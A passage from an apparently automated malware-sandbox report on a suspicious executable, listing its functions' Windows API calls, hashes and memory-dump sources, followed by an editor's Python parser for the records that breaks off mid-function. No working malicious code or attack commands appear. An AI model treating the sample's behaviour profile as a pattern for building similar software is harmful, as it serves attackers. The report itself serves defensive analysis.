                • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D

Control-flow Graph (basic blocks as node: address range, API calls -> successor nodes; legend: Executed / Not Executed)
                • 629: 405afd-405b2e CreateProcessW -> 630, 631
                • 630: 405b30-405b39 CloseHandle -> 631
                • 631: 405b3c-405b3d
                APIs
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,?), ref: 00405B26
                • CloseHandle.KERNEL32(?), ref: 00405B33
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID:
                • API String ID: 3712363035-0
                • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                • Instruction ID: ba1bbf2d7d3ffeb3fca6c599dd16ba0b61ff9929c503e82162f47076b114721a
                • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                • Instruction Fuzzy Hash: 43E0B6F4600209BFEB10ABA4EE09F7F7BBCEB44604F004525BE54F6191D7B9A9148A79

Control-flow Graph (basic blocks as node: address range, calls -> successor nodes; legend: Executed / Not Executed)
                • 632: 4068e7-406901 GetModuleHandleA -> 633, 634
                • 633: 406903-406904 call 406877 -> 637
                • 634: 40690d-40691a GetProcAddress -> 635
                • 635: 40691e-406920
                • 637: 406909-40690b -> 634, 638
                • 638: 40691c -> 635
                APIs
                • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                  • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                  • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                  • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                APIs
                • GetFileAttributesW.KERNELBASE(?,004030BD,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 0040600E
                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                • GetLastError.KERNEL32 ref: 00405ADC
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                APIs
                • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034BF,?,?,00403306,?,00000004), ref: 004060A1
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                APIs
                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,00403475,?,00793700,?,00793700,?,?,00000004), ref: 004060D0
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                APIs
                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406415,?,?,?,?,: Completed,?), ref: 004063AB
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                • Instruction ID: 951ca2c494bd41099ddae5d9c01dd02c2d656467939f39d3ba1b92e1fa2b8fa2
                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                • Instruction Fuzzy Hash: 68D0123200020DBBDF115F919D11FAB371DAB08310F014426FE06E40A1D775D530AB64
                APIs
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004044D4
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00403242,?), ref: 004034D0
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                APIs
                • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                APIs
                • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
                • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061A4
                  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405F7F
                  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(?,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB1
                • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 004061C1
                • wsprintfA.USER32 ref: 004061DF
                • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?), ref: 0040621A
                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406229
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406261
                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                • GlobalFree.KERNEL32(00000000), ref: 004062C8
                • CloseHandle.KERNEL32(00000000), ref: 004062CF
                  • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(?,004030BD,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 0040600E
                  • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %ls=%ls$[Rename]$Uz$]z
                • API String ID: 2171350718-2939442745
                • Opcode ID: 4a8f923ecd3868fcc62f38f654b5519550448c5a84d4b02ffe541a827d0a2b5c
                • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                • Opcode Fuzzy Hash: 4a8f923ecd3868fcc62f38f654b5519550448c5a84d4b02ffe541a827d0a2b5c
                • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
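                The "APIs" records above follow one fixed line shape: a bullet, an optional "Part of subcall function XXXXXXXX:" prefix, then Api.MODULE, an optional argument list in parentheses, and the call-site address after "ref:". When a report has hundreds of these records, it is quicker to parse them than to read them. The parser below is an added example by the editor, not Joe Sandbox code; its input is copied from the [Rename] record above (the CloseHandle, GetShortPathNameW, lstrlenA, wsprintfA, GlobalAlloc and lstrcpyA lines), and the tag table that groups APIs into file, registry, memory, string and ui is an editorial assumption rather than a Joe Sandbox category.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox text report.

Added example (editor's code, not part of Joe Sandbox or of the report).
SAMPLE is copied from the [Rename] record in the report; TAGS is an
editorial grouping used for triage, not a Joe Sandbox taxonomy.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# One bullet line: optional "Part of subcall function XXXXXXXX:", then
# Api.MODULE, optional "(args)", then "ref: XXXXXXXX" (comma optional).
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Lines copied from the report's [Rename] record (constructed sample input).
SAMPLE = """\
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
• GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061A4
  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405F7F
• wsprintfA.USER32 ref: 004061DF
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406229
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406261
Strings
Memory Dump Source
• Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

# Editorial grouping of API names (A/W suffix stripped) for quick triage.
TAGS = {
    "file": ("CreateFile", "ReadFile", "WriteFile", "SetFilePointer", "GetFileSize",
             "GetFileAttributes", "CloseHandle", "GetShortPathName"),
    "registry": ("RegOpenKeyEx",),
    "memory": ("GlobalAlloc", "GlobalFree"),
    "string": ("lstrlen", "lstrcpy", "wsprintf"),
    "ui": ("SendMessage", "SetTimer", "SetWindowText", "SetDlgItemText"),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                    # call-site address in the dump
    subcall_of: Optional[int]   # callee address when listed as "Part of subcall"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into FunctionRecords; one record per 'APIs' heading."""
    records: List[FunctionRecord] = []
    cur, section = None, None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            section = "apis"
            continue
        if s == "Strings":
            section = "strings"
            continue
        if s == "Memory Dump Source":
            section = None
            continue
        if cur is None or section is None:
            continue
        if section == "apis":
            m = _CALL_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                sub = int(m["sub"], 16) if m["sub"] else None
                cur.calls.append(ApiCall(m["api"], m["mod"].upper(), args, int(m["ref"], 16), sub))
        elif section == "strings" and s.startswith("•"):
            cur.strings.append(s.lstrip("• ").strip())
    return records


def tag_for(api: str) -> str:
    """Map an API name to a triage tag; drops a trailing A/W ANSI/Unicode suffix."""
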